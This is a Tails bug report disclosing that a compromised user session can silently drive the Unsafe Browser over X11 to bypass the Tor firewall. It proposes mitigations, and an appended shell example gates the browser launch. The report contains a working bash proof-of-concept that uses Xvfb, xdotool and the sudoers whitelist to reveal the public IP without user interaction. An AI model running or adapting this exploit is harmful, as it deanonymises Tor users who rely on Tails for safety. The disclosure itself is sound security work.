The Unsafe Browser allows a compromised amnesia user to retrieve the public IP address with no user interaction
Parent Task: #7072
The Problem
The X11 protocol has long been known to not provide isolation between windows. Here I will show that it can be abused to bypass the firewall without any user interaction or visible side-effects by abusing the Unsafe Browser. I also provide mitigations while waiting for the switch to Wayland.
The existence of the clearnet user and the sudoers whitelist[1] for the Unsafe Browser makes it possible to reliably bypass the firewall by abusing the X11 protocol. Previously, I’ve seen doubts that this can be done surreptitiously and claims that it would necessarily require that the users see the browser pop up and the mouse be moved without their control. I have written a simple PoC (proof of concept) exploit which bypasses the firewall to show that this is untrue:
#!/bin/bash
export DISPLAY=:69
mv /run/user/1000/bus{,.bak}
Xvfb $DISPLAY -r -nocursor & xpid=$!
sleep 1
sudo DISPLAY=$DISPLAY unsafe-browser &>/dev/null &
xdotool search --sync --name zenity 1>/dev/null
xdotool key --delay 200 Tab Return
xdotool search --sync --name Unsafe 1>/dev/null
xdotool key --delay 200 ctrl+l
xdotool type --delay 200 www.yourip.us
xdotool key --delay 200 Return
xdotool search --sync --name Your getwindowname | awk '{print $5}'
mv /run/user/1000/bus{.bak,}
kill "$xpid"
exit 0
The Unsafe Browser, or more specifically the clearnet user, should not be enabled and functional by default. Whenever it is not needed, the clearnet user should be locked, and the Unsafe Browser should either throw an error on access or not even be displayed. I can think of three mitigations:
- Disable the browser by default, requiring it to be explicitly enabled in the splash screen.
- Disable the browser as soon as Tor successfully connects, which would indicate no captive portal.
- Attempt captive portal detection[2] to detect request rewrites and enable the Unsafe Browser only then.
I am marking this as a bug because this PoC clearly shows that the Unsafe Browser violates the security principles in the specified design documents[3]. Until the switch to Wayland is completed (and perhaps even then), the existence of the clearnet user should be considered incompatible with anonymous Tor usage. I am currently working on another exploit which bypasses the browser AppArmor profile without user interaction in order for this to be possible from within the context of a compromised browser as well. If I have the time, I will finish it up and report it as well.
[1]: https://git-tails.immerda.ch/tails/plain/config/chroot_local-includes/etc/sudoers.d/zzz_unsafe-browser
[2]: https://www.chromium.org/chromium-os/chromiumos-design-docs/network-portal-detection
[3]: https://tails.boum.org/contribute/design/Unsafe_Browser/
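A launch gate for the first two mitigations listed above, as an added example that is not part of the original report or of Tails: it fails closed and allows the Unsafe Browser only when the user opted in and Tor has not finished bootstrapping. The opt-in file format and the function names are assumptions; the sample lines follow the format of Tor's reply to `GETINFO status/bootstrap-phase` and are constructed.

```shell
#!/bin/bash
# Added example, not Tails code. Every unexpected input results in "deny".

# Constructed sample replies to "GETINFO status/bootstrap-phase".
SAMPLE_DONE='250-status/bootstrap-phase=NOTICE BOOTSTRAP PROGRESS=100 TAG=done SUMMARY="Done"'
SAMPLE_STUCK='250-status/bootstrap-phase=NOTICE BOOTSTRAP PROGRESS=10 TAG=conn SUMMARY="Connecting to a relay"'

# Print the PROGRESS value (0-100) from a bootstrap-phase reply.
# Returns 1 when the field is missing, non-numeric or out of range.
bootstrap_progress() {
    local p
    case $1 in *" PROGRESS="*) ;; *) return 1 ;; esac
    p=${1#*" PROGRESS="}    # drop everything up to the field
    p=${p%% *}              # keep only the value
    case $p in ''|*[!0-9]*) return 1 ;; esac
    [ "${#p}" -le 3 ] && [ "$p" -le 100 ] || return 1
    echo "$p"
}

# Mitigation 1: opt-in recorded at the splash screen.
# Assumed format: a file containing the exact line "unsafe_browser=enabled".
opted_in() {
    [ -r "$1" ] || return 1
    grep -qx 'unsafe_browser=enabled' "$1"
}

# $1 = opt-in file, $2 = bootstrap-phase reply.
# Prints the decision and returns 0 only for "allow".
unsafe_browser_gate() {
    local p
    opted_in "$1" || { echo "deny: not enabled at the splash screen"; return 1; }
    p=$(bootstrap_progress "$2") || { echo "deny: Tor state unknown"; return 1; }
    # Mitigation 2: a finished bootstrap means there is no captive portal.
    [ "$p" -lt 100 ] || { echo "deny: Tor is connected"; return 1; }
    echo "allow: opted in, Tor bootstrap at ${p}%"
}

# Demo on constructed input: opted in, first with Tor stuck, then connected.
demo_file=$(mktemp)
echo 'unsafe_browser=enabled' > "$demo_file"
unsafe_browser_gate "$demo_file" "$SAMPLE_STUCK" || true
unsafe_browser_gate "$demo_file" "$SAMPLE_DONE" || true
rm -f "$demo_file"
```

The gate only decides; for it to be effective it has to run on the privileged side of the sudoers whitelist, where the amnesia user cannot edit the opt-in file or the Tor reply.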
Next steps
Tails 4.8 ships with a (persisting) option to disable the Unsafe Browser.
Blockers: